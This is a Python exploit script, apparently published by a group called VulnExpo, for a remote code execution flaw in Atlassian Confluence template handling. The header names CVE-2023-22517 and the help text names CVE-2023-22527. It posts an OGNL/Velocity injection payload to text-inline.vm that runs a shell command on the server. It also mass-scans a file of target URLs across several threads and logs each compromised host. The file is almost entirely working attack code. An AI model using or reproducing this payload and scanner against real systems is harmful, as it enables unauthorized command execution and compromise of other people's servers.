Confluence_CVE-2023-22517_Exploit.py

# 作者: VulnExpo
# 日期: 2024-01-22

import requests
import argparse
import threading
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def check_for_vulnerability(url, proxies=None, success_file=None):
	headers = {
			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
			"Content-type": "application/x-www-form-urlencoded"
	}

	payload = "name=aaxxxa&list=ccc&list=ddd&list=ddd&list=ddd&list=ddd&listKey=11&size=1&multiple=1&label=111\\u0027%2b#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.poc[0],{})%2b\\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({'id'}))"

	try:
		response = requests.post(url + '/template/aui/text-inline.vm', headers=headers, data=payload, proxies=proxies, verify=False)

		if response.status_code == 200 and 'X-Cmd-Response' in response.headers:
			with open(success_file, 'a') as s_file:
				x_cmd_response = response.headers.get('X-Cmd-Response', 'N/A')
				s_file.write(f"++++++++++++++++++\n")
				s_file.write(f"目标URL: {url}\n")
				s_file.write(f"响应内容:\n{x_cmd_response}\n\n")
			return True
	except Exception as e:
		print(f"发生异常：{e}")

	return False

def scan_targets(targets, proxies=None, success_file=None):
	for target in targets:
		target = target.strip()
		check_for_vulnerability(target, proxies, success_file)

def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
	threads = []

	for i in range(num_threads):
		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
		threads.append(thread)

	for thread in threads:
		thread.start()

	for thread in threads:
		thread.join()

if __name__ == '__main__':
	parser = argparse.ArgumentParser(description="Atlassian Confluence 模板注入代码执行漏洞CVE-2023-22527")
	parser.add_argument("-u", "--url", help="目标URL")
	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
	args = parser.parse_args()

	if not args.url and not args.file:
		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
		exit(1)

	if args.url:
		urls = [args.url]
	elif args.file:
		with open(args.file, 'r') as file:
			urls = file.readlines()

	success_file = 'success_targets.txt'

	proxies = {
		"http": args.proxy,
		"https": args.proxy
	} if args.proxy else None

	multi_threaded_scan(urls, proxies, success_file, args.threads)

	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")